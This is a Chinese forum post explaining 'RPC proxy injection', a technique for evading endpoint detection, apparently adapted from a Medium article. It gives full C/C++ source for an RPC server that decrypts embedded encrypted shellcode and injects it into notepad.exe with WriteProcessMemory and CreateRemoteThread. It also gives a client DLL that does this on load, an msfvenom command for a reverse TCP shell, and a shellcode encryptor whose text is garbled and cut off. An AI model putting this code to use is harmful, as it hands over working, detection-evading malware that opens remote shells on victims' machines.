RPC 代理远程注入dll获得shell

RPC 代理远程注入dll获得shell

RPC 接口是什么？

RPC（Remote Procedure Call，远程过程调用）接口，本质是：

一组被暴露出来、允许“远程调用”的函数定义 + 通信协议 + 序列化规则

是 Windows 操作系统中用于不同进程（甚至不同机器）之间进行通信的标准机制。许多系统服务（Service）和后台进程都作为“RPC 服务器”运行，等待其他程序（“RPC 客户端”）发送请求来执行特定的任务。
今天在推特上刷到文章RPC 代理注入。欢迎阅读这篇新的 Medium 文章。在… | 作者：S12 - 0x12Dark Development | 2026 年 1 月 | Medium --- RPC Proxy Injection. Welcome to this new Medium post. In… | by S12 - 0x12Dark Development | Jan, 2026 | Medium：使得攻击者利用RPC机制将恶意代码（如 Shellcode 、DLL）强制加载到另一个合法进程的内存中并运行，以隐藏自身行踪或获取更高权限。
技术原理

作者 s12deff 之前的研究脉络（关于利用 RPC 进行进程间通信、自定义 DLL 加载等文章），这项技术的工作原理大致如下：
寻找 RPC 接口： 攻击者首先会在目标进程（通常是高权限的系统服务）中寻找一个开放的 RPC 接口。Windows 系统中有成千上万个 RPC 接口。
利用 RPC 作为载体 (Proxy)： 传统的注入通常需要打开目标进程句柄（OpenProcess），写入内存（WriteProcessMemory），然后创建线程（CreateRemoteThread）。这种行为很容易被 EDR（端点检测与响应系统）拦截。 RPC Proxy Injection 则不同，它表现为一个合法的 RPC 客户端向 RPC 服务器发送请求。这个请求中可能包含了恶意的 Payload，或者是触发漏洞的参数。
触发执行： 攻击者调用 RPC 接口中的某个特定函数。这个函数在目标进程内部执行时，会被诱导去执行攻击者指定的代码，或者加载攻击者指定的 DLL。

• 利用RPC 函数本身允许传递回调函数指针，或者通过利用 RPC 消息处理中的逻辑，将执行流重定向到恶意代码。因为代码执行是由合法的 RPC 服务进程发起的（代表客户端执行），所以看起来像是合法的业务操作。
  

复现流程

其核心思想是将敏感操作分散到两个不同的进程中，以打断 EDR（端点检测与响应系统）的攻击链检测：

• DLL (Client)：负责“准备工作”（查找目标、分配内存）。它看起来像是一个正常的程序在申请资源，但它不写入任何恶意代码，也不执行。
  
• EXE (Server)：负责“脏活”（解密 Shellcode、写入内存、创建线程）。由于它通过 RPC 接收指令，EDR 很难将 DLL 的分配行为与 EXE 的写入/执行行为关联起来。
  

1.创建message idl并编译

message.idl

1. [
2.     uuid(87654321-1234-5678-1234-567812345678),
3.     version(1.0),
4.     pointer_default(unique)
5. ]
6. interface MessageRPC
7. {
8.     void GetSize(
9.         [in] handle_t IDL_handle,
10.         [out] hyper* size
11.     );
13.     void TriggerInjection(
14.         [in] handle_t IDL_handle,
15.         [in] int pid,
16.         [in] hyper hProcess,
17.         [in] hyper allocMem,
18.         [out, string] unsigned char** response
19.     );
20. }

复制代码

message.acf

1. [
2.     implicit_handle(handle_t hBinding)
3. ]
4. interface MessageRPC
5. {
6. }

复制代码

打开Visual Studio Developer Command Prompt，

1. midl /env x64 /app_config message.idl

复制代码

得到

• message.h (头文件)
  
• message_c.c (客户端存根，给 DLL 用)
  
• message_s.c (服务器存根，给 EXE 用)
  

2.编译客户端和服务器

RpcServer.cpp

1. #define _CRT_SECURE_NO_WARNINGS
2. #include <stdio.h>
3. #include <windows.h>
4. #include <stdlib.h>
5. #include <time.h>
6. #include <stdint.h>
7. #include "message.h"
9. #pragma comment(lib, "Rpcrt4.lib")
12. // Add evasion
13. // 1- Encrypted shellcode = DONE!
14. // 2- Decode at runtime = DONE!
15. // 3- Divide responsibility -> OpenProcess and VirtualAllocEx in the DLL. WriteProcessMemory and CreateRemoteThread in the RPC server = DONE!
16. // 4- Change to CustomWriteProcessMemory
17. // 5- Alternative to CreateRemoteThread
18. // 6- Divide Shellcode responsibility -> DLL writes a part of shellcode + RPC server writes the rest
21. unsigned char buf[] = "\x76\x18\xfc\x42\x85\x55\xa1\x16\x49\x58\x7b\xa4\x8b\xd9\x03\xb0\x5f\x92\xa2\x78\xb3\x6d\x17\x84\xe5\x30\xb2\xea\x72\xae\x5a\x1e\x21\x66\x2b\xfc\xfc\x0b\xf1\xb7\xbc\x59\x82\x6e\x54\xae\x9c\xdf\x06\xf8\xec\xff\x29\xfe\x2d\xb9\xe6\x2d\xed\x96\x98\xeb\xc6\x25\x82\x75\x01\xe5\xd1\x50\x51\x64\x2f\x43\x53\xa8\x8c\xe5\x4d\x59\x71\xab\x6d\x63\x60\xda\x96\xb0\x1b\x45\x9e\xb0\xb5\xf9\xc2\xaf\x3b\x1d\x1e\x6c\xd6\x6a\x85\xfc\xcb\xad\xaa\x16\x28\xf3\x29\x1b\x82\xd5\x53\xd1\x13\xc2\xdb\xf3\xeb\x97\x9d\x7d\x80\xea\x5a\x6e\x22\x14\xac\xa1\x13\xcd\xab\x23\x60\x4e\x6a\xa6\x8d\xff\xd7\x5b\x02\x71\xf9\x06\xaf\xb7\xed\xc3\xa1\x79\x71\xc0\x39\xcd\x96\xed\x00\x09\x4c\xb3\xcf\x30\x00\xe8\x23\x7e\x22\x26\x82\x62\xfd\xae\x59\x20\x70\xe0\x47\x8d\xfb\x7b\xc2\x9e\x65\xd0\x52\x83\xf4\x82\xa8\xec\xa4\xc2\x0d\x97\x4d\xa5\xa6\xb7\x0d\x94\x36\xab\xb4\x1c\xea\xf4\xdd\x75\x41\xcf\xb1\xab\x6d\x98\xe2\x06\xa2\x1f\x99\xf1\x20\x4e\x35\x29\x94\xd8\xd4\x7f\x50\xf3\x04\x1f\x49\x36\xa6\x96\x5f\xab\x4d\x54\x02\xc4\x2d\x4c\x93\xae\x63\x9d\x84\x85\x63\xcf\xb8\x99\xfb\xb4\x28\x53\x64\x09\x11\x11\xe5\x3a\x5c\xc2\x35\xb9\xe6\xab\x44\x20\x63\x35\x90\x41\x73\x6b\x3f\x10\xd0\xe7\xf3\x0e\x92\x5b\xbc\x79\xd3\x02\xc9\xea\x74\x68\xcc\xd3\xb6\x58\x72\xac\x88\x15\x9d\xfc\x7c\x4a\x0d\xe7\xbe\x0f\xba\x12\x17\x87\xf2\xea\x3b\x08\x9c\x0e\x2f\x71\xdd\x66\x37\x33\x64\xe4\x54\x9c\x43\x23\x7c\x98\x49\x47\x91\x44\xe1\xbc\x2a\x8f\xda\xaf\xa3\xea\xbc\x4e\xd0\x82\x3f\x71\xa6\xa5\x62\xc0\x07\xbb\x82\x80\xb9\xef\x81\x42\x48\x54\x6d\x5c\x63\xc0\x5d\x08\x32\x58\x8c\x6c\x8f\x8b\x58\xb6\x7b\xb6\x71\xa7\x6b\x9f\x69\x25\x73\xec\xda\xa8\x93\xeb\xa8\xfe\x82\xdc\x4e\x34\x46\x93\x64\x71\x2e\x0d\xe7\x48\x8e\x9c\xeb\x21\xfd\x99\x36\xfb\x1b\x7e\xae\xab\x5a\x3c\xde\x2c\xfa\x06\xd1\xa0\x4d\x05\xca\x8f\xe8\x4f\xe2\xf4\xcd\x6a\xd1\x0a\x68\xb8\xae\x2d\xee\x7f\x37\x3e\xe4\x29\xb7\x18\x5f\x94\x93\x1e\x40\x32\xb4\x16\x96\xe2\xa2\x6a\xaf\x50\x62\x10\xf4\x4e\xca\xa6\xbe\xe8\x60\x35";
22. int bufLen = sizeof(buf) ;
24. // ==================== GLOBAL STATE ====================
25. unsigned char* g_DecryptBuffer = NULL;
26. SIZE_T g_PaddedLen = 0;
28. #define ROUNDS 45
29. #define BLOCK_BYTES 16
31. uint64_t roundKeys[ROUNDS];
33. // ==================== CRC32 ====================
34. uint32_t crc32Table[256];
36. void generateCrc32Table() {
37.     for (uint32_t i = 0; i < 256; i++) {
38.         uint32_t c = i;
39.         for (int j = 0; j < 8; j++) {
40.             c = (c & 1) ? (0xEDB88320 ^ (c >> 1)) : (c >> 1);
41.         }
42.         crc32Table[i] = c;
43.     }
44. }
46. uint32_t crc32(const unsigned char* data, size_t length) {
47.     uint32_t crc = 0xFFFFFFFF;
48.     for (size_t i = 0; i < length; i++) {
49.         crc = crc32Table[(crc ^ data[i]) & 0xFF] ^ (crc >> 8);
50.     }
51.     return crc ^ 0xFFFFFFFF;
52. }
54. // ==================== SPECK ====================
55. void parseHexKey(const char* keyStr, uint64_t key[2]) {
56.     char buffer[17] = { 0 };
57.     strncpy(buffer, keyStr, 16);
58.     key[0] = strtoull(buffer, NULL, 16);
59.     strncpy(buffer, keyStr + 16, 16);
60.     key[1] = strtoull(buffer, NULL, 16);
61. }
63. uint64_t rol(uint64_t x, int r) {
64.     return (x << r) | (x >> (64 - r));
65. }
67. uint64_t ror(uint64_t x, int r) {
68.     return (x >> r) | (x << (64 - r));
69. }
71. void speckKeySchedule(uint64_t key[2]) {
72.     roundKeys[0] = key[0];
73.     uint64_t b = key[1];
74.     for (int i = 0; i < ROUNDS - 1; i++) {
75.         b = (ror(b, 8) + roundKeys[i]) ^ i;
76.         roundKeys[i + 1] = rol(roundKeys[i], 3) ^ b;
77.     }
78. }
80. void speckEncrypt(uint64_t* x, uint64_t* y) {
81.     for (int i = 0; i < ROUNDS; i++) {
82.         *x = (ror(*x, 8) + *y) ^ roundKeys[i];
83.         *y = rol(*y, 3) ^ *x;
84.     }
85. }
87. void speckDecrypt(uint64_t* x, uint64_t* y) {
88.     for (int i = ROUNDS - 1; i >= 0; i--) {
89.         *y = ror(*y ^ *x, 3);
90.         *x = rol((*x ^ roundKeys[i]) - *y, 8);
91.     }
92. }
94. // ==================== RPC FUNCTIONS ====================
96. void GetSize(handle_t IDL_handle, hyper* size)
97. {
98.     printf("[SERVER] GetSize: Starting\n");
100.     if (size == NULL) {
101.         printf("[SERVER ERROR] GetSize: size is NULL\n");
102.         return;
103.     }
105.     const char* keyStr = "A9xK4R0E2Wc6B1D8P5N7ZL3GJQHfIeMy";
106.     uint64_t key[2];
108.     parseHexKey(keyStr, key);
109.     speckKeySchedule(key);
111.     uint64_t* iv = (uint64_t*)buf;
113.     int totalLen = sizeof(buf) - 1;
114.     int payloadLen = totalLen - BLOCK_BYTES;
115.     int paddedLen = (payloadLen + BLOCK_BYTES - 1) & ~(BLOCK_BYTES - 1);
117.     printf("[SERVER] GetSize: Calculated padded length = %d\n", paddedLen);
119.     if (g_DecryptBuffer) {
120.         printf("[SERVER] GetSize: Freeing previous buffer\n");
121.         free(g_DecryptBuffer);
122.         g_DecryptBuffer = NULL;
123.     }
125.     g_DecryptBuffer = (unsigned char*)malloc(paddedLen);
126.     if (!g_DecryptBuffer) {
127.         printf("[SERVER ERROR] GetSize: malloc failed\n");
128.         *size = 0;
129.         return;
130.     }
132.     printf("[SERVER] GetSize: Buffer allocated successfully\n");
134.     memcpy(g_DecryptBuffer, buf + BLOCK_BYTES, paddedLen);
136.     uint64_t prevDecrypt[2] = { iv[0], iv[1] };
138.     for (int i = 0; i < paddedLen; i += BLOCK_BYTES) {
139.         uint64_t* block = (uint64_t*)(g_DecryptBuffer + i);
140.         uint64_t temp[2] = { block[0], block[1] };
142.         speckDecrypt(&block[0], &block[1]);
144.         block[0] ^= prevDecrypt[0];
145.         block[1] ^= prevDecrypt[1];
147.         prevDecrypt[0] = temp[0];
148.         prevDecrypt[1] = temp[1];
149.     }
151.     g_PaddedLen = paddedLen;
152.     *size = (hyper)paddedLen;
154.     printf("[SERVER SUCCESS] GetSize: Returning size = %lld\n", *size);
155. }
157. void TriggerInjection(
158.     handle_t IDL_handle,
159.     int pid,
160.     hyper hProcess,
161.     hyper allocMem,
162.     unsigned char** response
163. )
164. {
165.     printf("[SERVER] TriggerInjection: Starting\n");
166.     printf("[SERVER] TriggerInjection: PID=%d hProcess=0x%llx allocMem=0x%llx\n",
167.         pid, hProcess, allocMem);
169.     if (!response) {
170.         printf("[SERVER ERROR] TriggerInjection: response is NULL\n");
171.         return;
172.     }
174.     if (!g_DecryptBuffer) {
175.         printf("[SERVER ERROR] TriggerInjection: Decryption buffer is NULL\n");
176.         const char* msg = "Decryption buffer not initialized";
177.         *response = (unsigned char*)midl_user_allocate(strlen(msg) + 1);
178.         strcpy((char*)*response, msg);
179.         return;
180.     }
182.     HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
183.     if (!processHandle) {
184.         printf("[SERVER ERROR] TriggerInjection: OpenProcess failed (0x%08x)\n", GetLastError());
185.         const char* msg = "Failed to open target process";
186.         *response = (unsigned char*)midl_user_allocate(strlen(msg) + 1);
187.         strcpy((char*)*response, msg);
188.         return;
189.     }
191.     printf("[SERVER] TriggerInjection: Process opened successfully\n");
193.     LPVOID remoteMem = (LPVOID)(ULONG_PTR)allocMem;
194.     if (!remoteMem) {
195.         printf("[SERVER ERROR] TriggerInjection: allocMem is NULL\n");
196.         CloseHandle(processHandle);
197.         return;
198.     }
200.     SIZE_T written;
201.     if (!WriteProcessMemory(processHandle, remoteMem, g_DecryptBuffer, g_PaddedLen, &written)) {
202.         printf("[SERVER ERROR] TriggerInjection: WriteProcessMemory failed (0x%08x)\n", GetLastError());
203.         CloseHandle(processHandle);
204.         return;
205.     }
207.     printf("[SERVER SUCCESS] TriggerInjection: Wrote %zu bytes\n", written);
209.     HANDLE hThread = CreateRemoteThread(
210.         processHandle,
211.         NULL,
212.         0,
213.         (LPTHREAD_START_ROUTINE)remoteMem,
214.         NULL,
215.         0,
216.         NULL
217.     );
219.     if (!hThread) {
220.         printf("[SERVER ERROR] TriggerInjection: CreateRemoteThread failed (0x%08x)\n", GetLastError());
221.         CloseHandle(processHandle);
222.         return;
223.     }
225.     printf("[SERVER SUCCESS] TriggerInjection: Remote thread created\n");
227.     CloseHandle(hThread);
228.     CloseHandle(processHandle);
229.     free(g_DecryptBuffer);
230.     g_DecryptBuffer = NULL;
232.     const char* reply = "Injection succeeded";
233.     *response = (unsigned char*)midl_user_allocate(strlen(reply) + 1);
234.     strcpy((char*)*response, reply);
236.     printf("[SERVER SUCCESS] TriggerInjection: Completed successfully\n");
237. }
239. // ==================== RPC MEMORY ====================
240. void* __RPC_USER midl_user_allocate(size_t len) {
241.     return malloc(len);
242. }
244. void __RPC_USER midl_user_free(void* ptr) {
245.     free(ptr);
246. }
248. // ==================== MAIN ====================
249. // midl /env x64 /robust message.idl
250. // Include message_s.c and message.h
252. int main()
253. {
254.     RPC_STATUS status;
256.     status = RpcServerUseProtseqEpA(
257.         (RPC_CSTR)"ncalrpc",
258.         RPC_C_PROTSEQ_MAX_REQS_DEFAULT,
259.         (RPC_CSTR)"MessageRPC",
260.         NULL
261.     );
263.     if (status) return status;
265.     status = RpcServerRegisterIf(
266.         MessageRPC_v1_0_s_ifspec,
267.         NULL,
268.         NULL
269.     );
271.     if (status) return status;
273.     printf("[SERVER] RPC Server running...\n");
275.     status = RpcServerListen(
276.         1,
277.         RPC_C_LISTEN_MAX_CALLS_DEFAULT,
278.         FALSE
279.     );
281.     return status;
282. }

复制代码

dllmain.cpp

1. // dllmain.cpp : RPC Client DLL that automatically connects to the local server
2. #include <Windows.h>
3. #include <stdio.h>
4. #include <stdlib.h>
5. #include <rpc.h>
6. #include <string>
7. #include <iostream>
8. #include <tlhelp32.h>
9. #include "message.h" // Generated by MIDL - includes the interface definitions
10. #pragma comment(lib, "Rpcrt4.lib")
12. using namespace std;
14. int getPIDbyProcName(const string& procName) {
15.     OutputDebugStringW(L"[DEBUG] getPIDbyProcName: Starting process search");
17.     int pid = 0;
18.     HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
19.     if (hSnap == INVALID_HANDLE_VALUE) {
20.         OutputDebugStringW(L"[ERROR] getPIDbyProcName: CreateToolhelp32Snapshot failed");
21.         return 0;
22.     }
24.     OutputDebugStringW(L"[DEBUG] getPIDbyProcName: Snapshot created successfully");
26.     PROCESSENTRY32W pe32;
27.     pe32.dwSize = sizeof(PROCESSENTRY32W);
28.     if (Process32FirstW(hSnap, &pe32) != FALSE) {
29.         wstring wideProcName(procName.begin(), procName.end());
30.         wchar_t msg[512];
31.         swprintf_s(msg, L"[DEBUG] getPIDbyProcName: Searching for process: %s", wideProcName.c_str());
32.         OutputDebugStringW(msg);
34.         do {
35.             if (_wcsicmp(pe32.szExeFile, wideProcName.c_str()) == 0) {
36.                 pid = pe32.th32ProcessID;
37.                 swprintf_s(msg, L"[SUCCESS] getPIDbyProcName: Process found! PID=%d", pid);
38.                 OutputDebugStringW(msg);
39.                 break;
40.             }
41.         } while (Process32NextW(hSnap, &pe32) != FALSE);
43.         if (pid == 0) {
44.             OutputDebugStringW(L"[WARNING] getPIDbyProcName: Process not found");
45.         }
46.     }
47.     else {
48.         OutputDebugStringW(L"[ERROR] getPIDbyProcName: Process32FirstW failed");
49.     }
51.     CloseHandle(hSnap);
52.     return pid;
53. }
55. // -----------------------------------------------------
56. // Memory management functions required by RPC
57. // -----------------------------------------------------
58. void* __RPC_USER midl_user_allocate(size_t size)
59. {
60.     wchar_t msg[256];
61.     swprintf_s(msg, L"[DEBUG] midl_user_allocate: Allocating %zu bytes", size);
62.     OutputDebugStringW(msg);
63.     return malloc(size);
64. }
66. void __RPC_USER midl_user_free(void* ptr)
67. {
68.     OutputDebugStringW(L"[DEBUG] midl_user_free: Freeing memory");
69.     free(ptr);
70. }
72. long long getPaddedLen() {
73.     OutputDebugStringW(L"[DEBUG] getPaddedLen: Starting");
75.     RPC_STATUS status;
76.     RPC_WSTR stringBinding = NULL;
77.     RPC_BINDING_HANDLE binding = NULL;
79.     // 1. Compose the binding string for local RPC (ncalrpc)
80.     OutputDebugStringW(L"[DEBUG] getPaddedLen: Composing binding string");
81.     status = RpcStringBindingComposeW(
82.         NULL,
83.         (RPC_WSTR)L"ncalrpc",
84.         NULL,
85.         (RPC_WSTR)L"MessageRPC",
86.         NULL,
87.         &stringBinding
88.     );
90.     if (status != RPC_S_OK)
91.     {
92.         wchar_t msg[256];
93.         swprintf_s(msg, L"[ERROR] getPaddedLen: RpcStringBindingCompose failed: 0x%08x", status);
94.         OutputDebugStringW(msg);
95.         return 0;
96.     }
98.     OutputDebugStringW(L"[SUCCESS] getPaddedLen: Binding string composed");
100.     // 2. Create the actual binding handle
101.     OutputDebugStringW(L"[DEBUG] getPaddedLen: Creating binding handle");
102.     status = RpcBindingFromStringBindingW(stringBinding, &binding);
103.     RpcStringFreeW(&stringBinding);
105.     if (status != RPC_S_OK)
106.     {
107.         wchar_t msg[256];
108.         swprintf_s(msg, L"[ERROR] getPaddedLen: RpcBindingFromStringBinding failed: 0x%08x", status);
109.         OutputDebugStringW(msg);
110.         return 0;
111.     }
113.     OutputDebugStringW(L"[SUCCESS] getPaddedLen: Binding handle created");
115.     RpcTryExcept
116.     {
117.         OutputDebugStringW(L"[DEBUG] getPaddedLen: Calling GetSize RPC");
118.         long long size = 0;
119.         GetSize(binding, &size);
121.         wchar_t msg[256];
122.         swprintf_s(msg, L"[SUCCESS] getPaddedLen: GetSize returned: %lld", size);
123.         OutputDebugStringW(msg);
125.         return size;
126.     }
127.         RpcExcept(EXCEPTION_EXECUTE_HANDLER)
128.     {
129.         wchar_t msg[256];
130.         swprintf_s(msg, L"[ERROR] getPaddedLen: RPC Exception: 0x%08x", RpcExceptionCode());
131.         OutputDebugStringW(msg);
132.     }
133.     RpcEndExcept
135.         OutputDebugStringW(L"[DEBUG] getPaddedLen: Finishing with error");
136.     return 0;
137. }
139. // -----------------------------------------------------
140. // Helper function to make the RPC call
141. // -----------------------------------------------------
142. void CallRpcServer(int pid, HANDLE hProcess, LPVOID allocMem)
143. {
144.     OutputDebugStringW(L"[DEBUG] CallRpcServer: Starting");
146.     wchar_t msg[256];
147.     swprintf_s(msg, L"[DEBUG] CallRpcServer: PID=%d, hProcess=0x%p, allocMem=0x%p", pid, hProcess, allocMem);
148.     OutputDebugStringW(msg);
150.     RPC_STATUS status;
151.     RPC_WSTR stringBinding = NULL;
152.     RPC_BINDING_HANDLE binding = NULL;
154.     OutputDebugStringW(L"[DEBUG] CallRpcServer: Composing binding string");
155.     status = RpcStringBindingComposeW(
156.         NULL,
157.         (RPC_WSTR)L"ncalrpc",
158.         NULL,
159.         (RPC_WSTR)L"MessageRPC",
160.         NULL,
161.         &stringBinding
162.     );
164.     if (status != RPC_S_OK)
165.     {
166.         swprintf_s(msg, L"[ERROR] CallRpcServer: RpcStringBindingCompose failed: 0x%08x", status);
167.         OutputDebugStringW(msg);
168.         return;
169.     }
171.     OutputDebugStringW(L"[SUCCESS] CallRpcServer: Binding string composed");
173.     OutputDebugStringW(L"[DEBUG] CallRpcServer: Creating binding handle");
174.     status = RpcBindingFromStringBindingW(stringBinding, &binding);
175.     RpcStringFreeW(&stringBinding);
177.     if (status != RPC_S_OK)
178.     {
179.         swprintf_s(msg, L"[ERROR] CallRpcServer: RpcBindingFromStringBinding failed: 0x%08x", status);
180.         OutputDebugStringW(msg);
181.         return;
182.     }
184.     OutputDebugStringW(L"[SUCCESS] CallRpcServer: Binding handle created");
186.     RpcTryExcept
187.     {
188.         OutputDebugStringW(L"[DEBUG] CallRpcServer: Calling TriggerInjection RPC");
189.         unsigned char* response = NULL;
191.         TriggerInjection(binding, pid, (hyper)hProcess, (hyper)allocMem, &response);
193.         OutputDebugStringW(L"[SUCCESS] CallRpcServer: TriggerInjection completed");
195.         if (response)
196.         {
197.             wchar_t dbg[512];
198.             swprintf_s(dbg, L"[SUCCESS] CallRpcServer: Server response: %S", response);
199.             OutputDebugStringW(dbg);
200.             midl_user_free(response);
201.         }
202.         else {
203.             OutputDebugStringW(L"[WARNING] CallRpcServer: NULL response from server");
204.         }
205.     }
206.         RpcExcept(EXCEPTION_EXECUTE_HANDLER)
207.     {
208.         swprintf_s(msg, L"[ERROR] CallRpcServer: RPC Exception: 0x%08x", RpcExceptionCode());
209.         OutputDebugStringW(msg);
210.     }
211.     RpcEndExcept
213.         OutputDebugStringW(L"[DEBUG] CallRpcServer: Finishing");
214. }
216. // -----------------------------------------------------
217. // Entry point
218. // -----------------------------------------------------
219. BOOL APIENTRY DllMain(HMODULE hModule,
220.     DWORD  ul_reason_for_call,
221.     LPVOID lpReserved)
222. {
223.     switch (ul_reason_for_call)
224.     {
225.         int pid;
226.         HANDLE hProcess;
227.         SIZE_T size;
228.         LPVOID allocMem;
229.         long long paddedLenValue;
231.     case DLL_PROCESS_ATTACH:
232.         OutputDebugStringW(L"[INFO] ========================================");
233.         OutputDebugStringW(L"[INFO] DllMain: DLL_PROCESS_ATTACH started");
234.         OutputDebugStringW(L"[INFO] ========================================");
236.         OutputDebugStringW(L"[DEBUG] DllMain: Getting PID of notepad.exe");
237.         pid = getPIDbyProcName("notepad.exe");
239.         if (pid == 0) {
240.             OutputDebugStringW(L"[ERROR] DllMain: Failed to find notepad.exe");
241.             return FALSE;
242.         }
244.         wchar_t msg[256];
245.         swprintf_s(msg, L"[DEBUG] DllMain: Opening process PID=%d", pid);
246.         OutputDebugStringW(msg);
248.         hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
249.         if (hProcess == NULL)
250.         {
251.             DWORD err = GetLastError();
252.             swprintf_s(msg, L"[ERROR] DllMain: OpenProcess failed. Error: 0x%08x", err);
253.             OutputDebugStringW(msg);
254.             return FALSE;
255.         }
257.         swprintf_s(msg, L"[SUCCESS] DllMain: Process opened. Handle=0x%p", hProcess);
258.         OutputDebugStringW(msg);
260.         OutputDebugStringW(L"[DEBUG] DllMain: Getting padded size");
261.         paddedLenValue = getPaddedLen();
263.         if (paddedLenValue == 0) {
264.             OutputDebugStringW(L"[ERROR] DllMain: getPaddedLen returned 0");
265.             CloseHandle(hProcess);
266.             return FALSE;
267.         }
269.         size = (SIZE_T)paddedLenValue;
270.         swprintf_s(msg, L"[DEBUG] DllMain: Size to allocate: %zu bytes", size);
271.         OutputDebugStringW(msg);
273.         OutputDebugStringW(L"[DEBUG] DllMain: Allocating memory in remote process");
274.         allocMem = VirtualAllocEx(hProcess, NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
276.         if (allocMem == NULL) {
277.             DWORD err = GetLastError();
278.             swprintf_s(msg, L"[ERROR] DllMain: VirtualAllocEx failed. Error: 0x%08x", err);
279.             OutputDebugStringW(msg);
280.             CloseHandle(hProcess);
281.             return FALSE;
282.         }
284.         swprintf_s(msg, L"[SUCCESS] DllMain: Memory allocated at: 0x%p", allocMem);
285.         OutputDebugStringW(msg);
287.         OutputDebugStringW(L"[DEBUG] DllMain: Calling CallRpcServer");
288.         CallRpcServer(pid, hProcess, allocMem);
290.         OutputDebugStringW(L"[INFO] ========================================");
291.         OutputDebugStringW(L"[INFO] DllMain: DLL_PROCESS_ATTACH completed");
292.         OutputDebugStringW(L"[INFO] ========================================");
294.         break;
296.     case DLL_THREAD_ATTACH:
297.         OutputDebugStringW(L"[DEBUG] DllMain: DLL_THREAD_ATTACH");
298.         break;
300.     case DLL_THREAD_DETACH:
301.         OutputDebugStringW(L"[DEBUG] DllMain: DLL_THREAD_DETACH");
302.         break;
304.     case DLL_PROCESS_DETACH:
305.         OutputDebugStringW(L"[DEBUG] DllMain: DLL_PROCESS_DETACH");
306.         break;
307.     }
308.     return TRUE;
309. }

复制代码

思路：DLL 被加载─> 找 notepad.exe─> OpenProcess─> RPC 调用 GetSize()─> Server 解密 shellcode，返回大小─> DLL VirtualAllocEx()─> RPC 调用 TriggerInjection()─> WriteProcessMemory、CreateRemoteThread
3.生成shellcode

MSF 生成一个 raw 格式的 shellcode

1. msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o payload.bin

复制代码

然后加密，硬编码进server
[code]#define _CRT_SECURE_NO_WARNINGS#include #include #include #include #include #include #include #include #include // ==================== 配置区域 ====================// 必须与 RpcServer.cpp 中的密钥保持一致const char* KEY_STR = "A9xK4R0E2Wc6B1D8P5N7ZL3GJQHfIeMy";#define ROUNDS 45#define BLOCK_BYTES 16// ==================== SPECK 核心算法 ====================uint64_t roundKeys[ROUNDS];void parseHexKey(const char* keyStr, uint64_t key[2]) {    char buffer[17] = { 0 };    strncpy(buffer, keyStr, 16);    key[0] = strtoull(buffer, NULL, 16);    strncpy(buffer, keyStr + 16, 16);    key[1] = strtoull(buffer, NULL, 16);}uint64_t rol(uint64_t x, int r) { return (x > (64 - r)); }uint64_t ror(uint64_t x, int r) { return (x >> r) | (x = 0; i--) {        *y = ror(*y ^ *x, 3);        *x = rol((*x ^ roundKeys) - *y, 8);    }}// ==================== 辅助工具函数 ====================// 读取文件std::vector ReadFile(const std::string& filename) {    std::ifstream file(filename, std::ios::binary);    if (!file) return {};    return std::vector((std::istreambuf_iterator(file)), std::istreambuf_iterator());}// 写入文件void WriteFile(const std::string& filename, const std::vector& data) {    std:fstream file(filename, std::ios::binary);    file.write((const char*)data.data(), data.size());}// 生成随机 IV (16字节)void GenerateRandomIV(uint64_t iv[2]) {    std::random_device rd;    std::mt19937_64 gen(rd());    iv[0] = gen();    iv[1] = gen();}// PKCS7 Padding (补齐数据到 16 的倍数)std::vector PKCS7Pad(const std::vector& data) {    std::vector padded = data;    int paddingSize = BLOCK_BYTES - (data.size() % BLOCK_BYTES);    for (int i = 0; i < paddingSize; i++) {        padded.push_back((unsigned char)paddingSize);    }    return padded;}// PKCS7 Unpadding (移除补齐)std::vector PKCS7Unpad(const std::vector& data) {    if (data.empty()) return {};    unsigned char paddingSize = data.back();    if (paddingSize > BLOCK_BYTES || paddingSize == 0) return data; // 格式不对，直接返回原数据    std::vector unpadded = data;    unpadded.resize(data.size() - paddingSize);    return unpadded;}// 输出为 C 语言数组格式void PrintAsCArray(const std::vector& data) {    std::cout

很好很强大  我过来先占个楼 待编辑

收藏一下   不知道什么时候能用到

喜欢鼓捣这些软件，现在用得少，谢谢分享！